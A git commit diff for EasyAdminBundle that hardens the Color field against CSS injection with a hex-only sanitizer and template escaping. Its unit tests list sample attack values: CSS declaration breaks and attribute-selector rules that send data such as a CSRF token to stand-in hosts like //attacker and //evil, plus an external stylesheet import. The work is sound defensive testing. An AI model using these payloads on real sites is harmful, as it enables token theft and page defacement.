Improve the security of the Color field

javiereguiluz · javiereguiluz · commit d1fb423f4f24 · 2026-04-18T09:51:12.000+02:00
diff --git a/config/services.php b/config/services.php
@@ -38,6 +38,7 @@
 use EasyCorp\Bundle\EasyAdminBundle\Field\Configurator\BooleanConfigurator;
 use EasyCorp\Bundle\EasyAdminBundle\Field\Configurator\ChoiceConfigurator;
 use EasyCorp\Bundle\EasyAdminBundle\Field\Configurator\CollectionConfigurator;
+use EasyCorp\Bundle\EasyAdminBundle\Field\Configurator\ColorConfigurator;
 use EasyCorp\Bundle\EasyAdminBundle\Field\Configurator\CommonPostConfigurator;
 use EasyCorp\Bundle\EasyAdminBundle\Field\Configurator\CommonPreConfigurator;
 use EasyCorp\Bundle\EasyAdminBundle\Field\Configurator\CountryConfigurator;
@@ -443,6 +444,8 @@
 
         ->set(ChoiceConfigurator::class)
 
+        ->set(ColorConfigurator::class)
+
         ->set(CollectionConfigurator::class)
             ->arg(0, service('request_stack'))
             ->arg(1, service(EntityFactory::class))
diff --git a/src/Field/Configurator/ColorConfigurator.php b/src/Field/Configurator/ColorConfigurator.php
@@ -0,0 +1,32 @@
+<?php
+
+namespace EasyCorp\Bundle\EasyAdminBundle\Field\Configurator;
+
+use EasyCorp\Bundle\EasyAdminBundle\Context\AdminContext;
+use EasyCorp\Bundle\EasyAdminBundle\Contracts\Field\FieldConfiguratorInterface;
+use EasyCorp\Bundle\EasyAdminBundle\Dto\EntityDto;
+use EasyCorp\Bundle\EasyAdminBundle\Dto\FieldDto;
+use EasyCorp\Bundle\EasyAdminBundle\Field\ColorField;
+
+/**
+ * @author Javier Eguiluz <javier.eguiluz@gmail.com>
+ */
+final class ColorConfigurator implements FieldConfiguratorInterface
+{
+    public function supports(FieldDto $field, EntityDto $entityDto): bool
+    {
+        return ColorField::class === $field->getFieldFqcn();
+    }
+
+    public function configure(FieldDto $field, EntityDto $entityDto, AdminContext $context): void
+    {
+        // the value is rendered inside a CSS `style` attribute; only accept the
+        // hex notation produced by `<input type="color">` (and its shorthand
+        // variants) to prevent CSS injection via characters like `;`, `:`, `(`.
+        $value = $field->getValue();
+        if (null !== $value && (!\is_string($value) || 1 !== preg_match('/^#[0-9a-fA-F]{3,8}$/', $value))) {
+            $field->setValue(null);
+            $field->setFormattedValue(null);
+        }
+    }
+}
diff --git a/templates/crud/field/color.html.twig b/templates/crud/field/color.html.twig
@@ -2,7 +2,9 @@
 {# @var field \EasyCorp\Bundle\EasyAdminBundle\Dto\FieldDto #}
 {# @var entity \EasyCorp\Bundle\EasyAdminBundle\Dto\EntityDto #}
 {% if field.customOptions.get('showSample') %}
-    <span class="color-sample" style="background: {{ field.value }}; {{ field.customOptions.get('showValue') ? 'margin-right: 5px;' }}" title="{{ field.formattedValue }}">&nbsp;</span>
+    {# ColorConfigurator sanitizes values before storing them, but for values stored before we
+       introduced this feature, we need to escape the field value to break CSS-declaration injection #}
+    <span class="color-sample" style="background: {{ field.value|e('html_attr') }}; {{ field.customOptions.get('showValue') ? 'margin-right: 5px;' }}" title="{{ field.formattedValue }}">&nbsp;</span>
 {% endif %}
 {% if field.customOptions.get('showValue') %}
     {{ field.formattedValue }}
diff --git a/tests/Unit/Field/ColorFieldTest.php b/tests/Unit/Field/ColorFieldTest.php
@@ -7,6 +7,7 @@
 use EasyCorp\Bundle\EasyAdminBundle\Dto\EntityDto;
 use EasyCorp\Bundle\EasyAdminBundle\Dto\FieldDto;
 use EasyCorp\Bundle\EasyAdminBundle\Field\ColorField;
+use EasyCorp\Bundle\EasyAdminBundle\Field\Configurator\ColorConfigurator;
 use Symfony\Component\Form\Extension\Core\Type\ColorType;
 
 class ColorFieldTest extends AbstractFieldTest
@@ -15,19 +16,26 @@ protected function setUp(): void
     {
         parent::setUp();
 
-        // colorField has no dedicated configurator, but we need to set formattedValue like CommonPreConfigurator does
-        $this->configurator = new class implements FieldConfiguratorInterface {
+        // wraps ColorConfigurator with the formattedValue propagation that
+        // CommonPreConfigurator performs in the real configurator chain.
+        $colorConfigurator = new ColorConfigurator();
+        $this->configurator = new class($colorConfigurator) implements FieldConfiguratorInterface {
+            public function __construct(private readonly ColorConfigurator $inner)
+            {
+            }
+
             public function supports(FieldDto $field, EntityDto $entityDto): bool
             {
                 return ColorField::class === $field->getFieldFqcn();
             }
 
             public function configure(FieldDto $field, EntityDto $entityDto, AdminContext $context): void
             {
-                // set formattedValue to value (like CommonPreConfigurator does for most fields)
                 if (null === $field->getFormattedValue()) {
                     $field->setFormattedValue($field->getValue());
                 }
+
+                $this->inner->configure($field, $entityDto, $context);
             }
         };
     }
@@ -120,7 +128,8 @@ public function testTemplateShowsSampleWhenEnabled(): void
         $html = $this->renderFieldTemplate($fieldDto, $this->entityDto, $this->adminContext);
 
         self::assertStringContainsString('class="color-sample"', $html);
-        self::assertStringContainsString('style="background: #ff5733', $html);
+        // the `#` is HTML-entity-encoded by |e('html_attr'); browsers decode it back in the style attribute
+        self::assertStringContainsString('style="background: &#x23;ff5733', $html);
         // the color value should only appear in attributes, not as text content after the span
         self::assertDoesNotMatchRegularExpression('/<\/span>\s*#ff5733/', $html);
     }
@@ -165,11 +174,76 @@ public function testTemplateShowsBothSampleAndValue(): void
         $html = $this->renderFieldTemplate($fieldDto, $this->entityDto, $this->adminContext);
 
         self::assertStringContainsString('class="color-sample"', $html);
-        self::assertStringContainsString('background: #0000ff', $html);
+        // the `#` is HTML-entity-encoded by |e('html_attr'); browsers decode it back in the style attribute
+        self::assertStringContainsString('background: &#x23;0000ff', $html);
         // the value should appear as text content after the sample span
         self::assertMatchesRegularExpression('/<\/span>\s*#0000ff\s*$/', $html);
     }
 
+    /**
+     * @dataProvider provideInvalidColorValues
+     */
+    public function testMaliciousValueIsNulled(string $malicious): void
+    {
+        $field = ColorField::new('color');
+        $field->setValue($malicious);
+        $fieldDto = $this->configure($field);
+
+        self::assertNull($fieldDto->getValue());
+        self::assertNull($fieldDto->getFormattedValue());
+    }
+
+    public static function provideInvalidColorValues(): iterable
+    {
+        yield 'CSS injection via declaration break' => ['red; background-image: url(//attacker/log?c='];
+        yield 'full-screen overlay payload' => ['red; position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; z-index: 9999'];
+        yield 'attribute selector exfiltration' => ['red; } input[name="_csrf_token"][value^="a"] ~ .color-sample { background: url(//evil/a); } .x {'];
+        yield 'external stylesheet import' => ['@import url("//evil/sheet.css")'];
+        yield 'css color name' => ['red'];
+        yield 'rgb function' => ['rgb(255, 0, 0)'];
+        yield 'rgba function' => ['rgba(255, 0, 0, 0.5)'];
+        yield 'hsl function' => ['hsl(0, 100%, 50%)'];
+        yield 'missing hash prefix' => ['ff5733'];
+        yield 'hex with trailing garbage' => ['#ff5733;'];
+        yield 'hex with whitespace' => ['#ff5733 '];
+    }
+
+    /**
+     * @dataProvider provideValidColorValues
+     */
+    public function testValidHexValueIsPreserved(string $valid): void
+    {
+        $field = ColorField::new('color');
+        $field->setValue($valid);
+        $fieldDto = $this->configure($field);
+
+        self::assertSame($valid, $fieldDto->getValue());
+    }
+
+    public static function provideValidColorValues(): iterable
+    {
+        yield 'short hex' => ['#fff'];
+        yield 'short hex uppercase' => ['#F0A'];
+        yield 'standard rrggbb' => ['#ff5733'];
+        yield 'standard rrggbb uppercase' => ['#FF5733'];
+        yield 'rrggbbaa with alpha' => ['#ff5733cc'];
+    }
+
+    public function testTemplateEscapesValueInStyleAttribute(): void
+    {
+        // Simulate a bypass of the configurator (e.g. a subclass overriding it):
+        // the template-side |e('html_attr') filter must still break CSS injection.
+        $field = ColorField::new('color');
+        $field->showSample();
+        $fieldDto = $this->configure($field);
+        $fieldDto->setValue('red; background-image: url(//evil)');
+
+        $html = $this->renderFieldTemplate($fieldDto, $this->entityDto, $this->adminContext);
+
+        self::assertStringNotContainsString('; background-image: url(//evil)', $html);
+        self::assertStringNotContainsString('url(//evil)', $html);
+    }
+
     public function testTemplateShowsNothingWhenBothDisabled(): void
     {
         $field = ColorField::new('color');
